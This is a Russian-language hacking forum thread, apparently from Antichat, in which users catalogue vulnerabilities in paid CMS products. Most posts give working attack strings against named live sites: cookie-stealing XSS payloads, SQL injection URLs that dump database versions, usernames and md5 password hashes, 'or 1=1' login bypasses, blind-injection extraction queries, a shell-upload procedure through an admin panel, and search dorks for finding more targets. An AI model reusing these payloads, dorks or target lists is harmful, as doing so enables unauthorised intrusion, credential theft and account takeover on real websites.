Обзор уязвимостей в платных CMS

Discussion in 'Веб-уязвимости' started by Roba, 10 Jan 2008.

  1. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    SMS-PARTNERS CMS

    http://demo.sms-partners.ru/page-contacts/%3E'%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E
     
    1 person likes this.
  2. Corwin

    Corwin Elder - Старейшина

    Joined:
    1 Aug 2008
    Messages:
    0
    Likes Received:
    15
    Reputations:
    0
    sql-injection in PHPKB 1.5 # старые версии 1.5, в новых багу пропатчили но версию не сменили
    Online Knowledgebase Builder System
    target/admin
    login: admin' or 1=1/*
    pass: fackthemall

    пример:
    panther.hartnell.edu/faqs/admin/
     
    2 people like this.
  3. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    PromoCMS

    ТИЦ: 150
    PR: 0

    site : http://www.promopx.ru/

    result :
    http://www.promopx.ru/portfolio/category.php?branch=17&service=-1+union+select+concat_ws(0x3a,version(),user(),database())--

    5.0.22:p[email protected]:promopx-rus_db

    копать колонки тут смысла не видел , так как бэйсик авторизация

    PS пытал счастье, но облом, пытайте счастье :) если хотите
     
    _________________________
    5 people like this.
  4. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    CustomCMS (CCMS)
    Цена: ~55 $
    Активная XSS

    /inbox.html
    В теле письма
    /notepad.html
    /index.php?page=Edit+Profile
    Уязвимы все поля
    /newthread-1.html
    В Title
    Пассивные XSS
    /pm.php?action=Send&rec=1"><script>alert();</script>


    /gamesearch.html
    в поле Search
    SQL Инъекции:
    Будет 404
    У меня например вывелось.

    6 Поле делат редирект.





    Раскрытие путей
    /thumbnailer.php?type[]=avatar


    Выполнение произвольного кода через админку:



    PS
    Боже мой...

    (с) Ctacok Специально для Antichat.ru
     
    #44 Ctacok, 12 Oct 2009
    Last edited: 15 Dec 2009
    4 people like this.
  5. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    Заливка шелла в ABO.CMS

    [1] Управление -> Скрипты -> Добавить скрипт:
    Название: test
    Описание: test
    Содержимое: <?phpinfo();?>
    Сохранить​
    [2] Страницы и структура -> Выбираем страницу (предположим что это будет "Новости") -> Выбираем поле (кликаем на него) и выбираем модуль Скрипты (кликаем на него) и жмем Добавить модуль -> Сохранить
    Переходим на ту страницу куда добавили модуль (предположим что это будет "Новости").
     
  6. Twin $park

    Twin $park Member

    Joined:
    15 Nov 2009
    Messages:
    9
    Likes Received:
    25
    Reputations:
    9
    Saitika CMS

    http://saitika.ru/

    Blind SQL inj

    Конкретный пример:

    -------------------------------------------------------------------
    Site edit CMS

    http://siteedit.ru/

    Passive XSS

    -------------------------------------------------------------------
    (с) Twin $park
     
    #46 Twin $park, 17 Nov 2009
    Last edited: 23 Dec 2009
    2 people like this.
  7. Twin $park

    Twin $park Member

    Joined:
    15 Nov 2009
    Messages:
    9
    Likes Received:
    25
    Reputations:
    9
    CMS I-market

    http://www.i-market.ru/

    Blind SQL inj


    пример:
    (с) Twin $park
     
    #47 Twin $park, 23 Nov 2009
    Last edited: 23 Dec 2009
  8. Twin $park

    Twin $park Member

    Joined:
    15 Nov 2009
    Messages:
    9
    Likes Received:
    25
    Reputations:
    9
    D.S CMS

    http://demo.smolovich.ru/ фиксированная цена отсутствует

    SQL inj


    пример:
    XSS

    (с) Twin $park
     
    #48 Twin $park, 17 Dec 2009
    Last edited: 18 Dec 2009
    6 people like this.
  9. Twin $park

    Twin $park Member

    Joined:
    15 Nov 2009
    Messages:
    9
    Likes Received:
    25
    Reputations:
    9
    Laderett CMS

    http://www.lederett.de/

    SQL inj

    паример:

    XSS

    (с) Twin $park
     
    #49 Twin $park, 28 Dec 2009
    Last edited: 2 Jan 2010
    1 person likes this.
  10. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    267
    Likes Received:
    644
    Reputations:
    208
    Product: Armixcms
    Author: armixcms.ru

    Blind-SQL?
    http://www.armixcms.ru/?id=25'+and+1=1/*
    http://www.armixcms.ru/?id=25%27+and+if%28substring%28version%28%29,1,1%29=5,1,0%29+--+
    логика срабатывает,но при попытке подбора столбцов,я уперся в 0.Мои запросы тупо игнорировались.Если ктотоподберет столбцы,милости прошу в лс,отредактирую сообщение с вашими копирайтами.
    Спасибо ElteRUS.раскручиваеться как слепая.
    Code:
    http://www.armixcms.ru/?id=25'+and+if(ascii(substring((select+table_name+ from+information_schema.columns+where+column_name+ like+0x257061737325+limit+0,1),3,1))=116,1,0)--+
     
    #50 m0Hze, 29 Dec 2009
    Last edited: 30 Dec 2009
  11. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    - "CMS MYSITE"

    Дорк:
    "на базе CMS MYSITE", "Результати 1 – 10 з приблизно 228 000 на запит "на базе CMS MYSITE". (0,31 сек)"


    ==================================================

    Уязвимость: sqli - из-за недостаточной фильтрации данных в параметре cid

    Выбераем любой сайт, и проверяем его наличие...
    HTML:
    http://lookmy.info/portal/modules.php?name=Content&pa=list_pages_categories&cid=-42+union+select+user_website,2+from+inform_users+where+user_website+LIKE+0x2575626225+LIMIT+0,1--+&pages_number=1
    Получаем логин...
    HTML:
    http://lookmy.info/portal/modules.php?name=Content&pa=list_pages_categories&cid=-42+union+select+username,2+from+inform_users+where+user_website+LIKE+0x2575626225+LIMIT+0,1--+&pages_number=1
    Получаем пароль, расшифровуем (обычный md5)...
    HTML:
    http://lookmy.info/portal/modules.php?name=Content&pa=list_pages_categories&cid=-42+union+select+user_password,2+from+inform_users+where+user_website+LIKE+0x2575626225+LIMIT+0,1--+&pages_number=1
    Логинимся...
    HTML:
    http://lookmy.info/portal/modules.php?name=Your_Account
    Ещё способы получить пароли к сайтам.

    ==================================================

    Уязвимость: SQLinj - из-за недостаточной фильтрации данных в параметрах gid, pid в модуле фотоальбома

    Принцип практически тот же..
    HTML:
    http://www.vfs.com.ua/index.php?id=5&show=4nalbum&do=showpic&pid=-42+union+select+user_website+from+inform_users+where+user_website+LIKE+0x2575626225+LIMIT+0,1--+

    Уязвимость: SQLinj - из-за недостаточной фильтрации данных в пост параметрах price_from, price_to, htlNfrom, htlNto, datePlusMinus в модуле поиска.

    Вот один из параметров
    HTML:
    http://tour.lookmy.info/index.php?id=3815&show=14071
    resortsToShow=all&countryKey=all&cityKey=all&CatHot=all&price_from=0+or+(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2)))&price_to=10000&day=12&mon=02&year=2010&datePlusMinus=2&htlNfrom=7&htlNto=15&roomNA=1&roomNC=0&htlBK=all&showRows=30+&btn_find=%CF%EE%E8%F1%EA%21
    Создать сайт можно впринципе бесплатно. Но все модули для него платные, потому и поместил его в "платные".

    (c)v1d0q
     
    #51 v1d0qz, 13 Mar 2010
    Last edited: 13 Apr 2010
    4 people like this.
  12. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    - "Stress web 8.0" - платная cms для MMORPG Lineage2

    Дорк:
    Результати 1 – 10 з приблизно 4 800 на запит inurl:"index.php?f=forget". (0,06 сек)


    Особенность:
    Magic_quotes_gpc = off


    Один из способов узнать версию, если папка install не удалена - /install/license.lic

    ==================================================

    Уязвимость: sqli - из-за недостаточной фильтрации данных в параметр step2. Файл forget.php

    Фильтр

    PHP:
    function safe($sql)
        {
            if (
    $this->mysql_link)
                return 
    mysql_real_escape_string($sql$this->mysql_link);
            else
                return 
    mysql_escape_string($sql);
        }
    Первый шаг

    PHP:
    elseif (isset($_POST["submit_lost"]) && isset($_POST["step1"]))
    {
        if (
    $_POST["l2sec_code"] != $_SESSION["sw_captcha"] or !$_SESSION["sw_captcha"])
        {
            
    $error_lost "<div class='error'>Обнаружены следующие ошибки:<br>Код безопасности не соответствует отображённому.</div>";
        }
        else
        {
            
    $_SESSION["sw_captcha"] = false;
            
    $lost_l2login $ldb->safe($_POST["lost_l2login"]);
            
    $sel_question $ldb->query("SELECT `l2question` FROM `accounts` WHERE `login`='{$lost_l2login}' LIMIT 0,1");
    Второй шаг

    PHP:
    elseif (isset($_POST["submit_lost"]) && isset($_POST["step2"]))
    {
        
    $lost_l2answer $_POST["lost_l2answer"];
        
    $lost_l2login $_POST["step2"];
        list(
    $lost_l2answer_db$_l2email) = $ldb->fetch_array($ldb->query("SELECT `l2answer`,`l2email` FROM `accounts` WHERE `login`='{$lost_l2login}' LIMIT 0,1"));
        if (
    $lost_l2answer != $lost_l2answer_db)
        {
            
    $error_lost "<div class='error'>Обнаружены следующие ошибки:<br>Ответ на секретный вопрос не верный!</div>";
        }
    Как видим, в post параметре step2 (второй шаг формы "забыли пароль"), не фильтруется логин участника, из-за чего и имеем данную уязвимость. Как эксплуатировать? Я думаю разберётесь ;)

    (c)v1d0q
     
    #52 v1d0qz, 12 Apr 2010
    Last edited: 12 Apr 2010
    3 people like this.
  13. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    DSite CMS
    http://www.dsite.ru/
    Компания Media Programming Group
    SQL inj
    Code:
    http://www.ttplus.ru/index.php?id=8&div_id=-88+union+select+version(),user(),database(),@@version_compile_os,5--+
    SQL inj
    Code:
    http://www.ttplus.ru/index.php?id=16&article=-25+union+select+1,2,3,4,5,6,7,8,9,10,11,12--+
     
    #53 Strilo4ka, 15 Apr 2010
    Last edited: 15 Apr 2010
    1 person likes this.
  14. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    http://www.webmotor.ru/
    CMS система WebMotor
    SQL inj
    Класика жанра.
    Пример где сработало:
    http://kids-garden.ru/
    Code:
    <tr><td><b>E-mail</b>:</td><td><input type=text name="email" class="tlog1" value=""></td></tr>
    <tr><td><b>Пароль</b>:</td><td><input type=password name=password class="tlog1" value=""></td></tr>
    <tr><td></td><td><input type=submit value=" Войти " class="enter_01"></td></tr>
    name = блабла' or 1=1--
    пасс любой.
    Есть вывод ошибки. Значит можна вытаскивать информацию в ошибку!
     
    #54 Strilo4ka, 15 Apr 2010
    Last edited: 15 Apr 2010
    1 person likes this.
  15. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Orcando CMS


    XSS
    Code:
    [URL=http://www.orcando.de/de/search/]http://www.orcando.de/de/search/[/URL] 
    В поиске:



     
    _________________________
    #55 Дирижабль, 9 Aug 2010
    Last edited: 9 Aug 2010
    3 people like this.
  16. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Update Orcando CMS


    Раскрытие Пути
    Code:
    [URL=http://www.orcando.de/de/search/]http://www.orcando.de/de/search/[/URL] 
    В поиске вписываем:

    PHP:
    aaa sss ss s</
    Result:

     
    _________________________
    3 people like this.
  17. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Dev4u CMS


    Активная XSS
    http://www.dev4u.de/cms/online-demo.php?seite_id=199
    Вписываем в:
    PHP:
     "><script>alert('xss')</script> 
    Пассивная XSS
    http://www.dev4u.de/cms/faq.php?tag=Programmierkenntnisse"><script>alert(01010)</script>
    +xss в поиске

    путь: http://www.dev4u.de/sitemap.xml
     
    _________________________
    #57 Дирижабль, 23 Aug 2010
    Last edited: 23 Aug 2010
    3 people like this.
  18. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    intellisite® CMS
    Passive XSS
    off site: http://www.intellisite.ch/index.php?nav= [XSS]
    <script>alert(01010)</script>
    + в Поиске
     
    _________________________
    #58 Дирижабль, 25 Sep 2010
    Last edited: 25 Sep 2010
    1 person likes this.
  19. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Fastpublish CMS 2.0.x

    SQL injection
    /aufbau/comment.php
    Пример:
    Code:
    http://www.fastpublish.de/aufbau/comment.php?artikel=106' limit 0 union select 1,0x6465,3,4,5,6,7,8,9,version(),11,12,13,14,15,16  ,17,18,19,0x434d53,21 --+1&popup=true
    Путь+USER: http://www.fastpublish.de/aufbau/comment.php?artikel=106
    Code:
    [SIZE=2][email protected][/COLOR]
    /www/htdocs/w0081419/Original_Neu/aufbau/comment.php[/SIZE]
     
    _________________________
    2 people like this.
  20. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Nexecuttive CMS
    офф сайт: http://nexecutive.de/

    SQL Injection:

    Code:
    http://nexecutive.de/glossar.php?i=glossary&g=showDef&categoryID=16+and+substring(version(),1,1)=3
    (3.23.58-log) -версия.

    Можно делать UPDATE:

    Code:
    http://nexecutive.de/update_nexecutive_db.php
    Активная xss:
    При регистрации, почти все поля.
    Code:
    http://nexecutive.de/index.php?i=register&languCode=de
    Пассивная xss:
    Code:
    [SIZE=2]http://nexecutive.de/cms-shop.php?i=nexec_detail&ktID=33&categoryID=48"><script>alert(document.cookie)</script>[/SIZE]
    и во многих других местах

    Путь:
    Code:
    [SIZE=2]http://nexecutive.de/spaw2/dialogs/dialog.php
    http://nexecutive.de/logIn_openID.php
    http://nexecutive.de/nexeclib/geomarkers.php
    http://nexecutive.de/admin_modul/admin_admin.php
    http://nexecutive.de/spaw2/spaw.inc.php[/SIZE]
     
    _________________________
    1 person likes this.
Loading...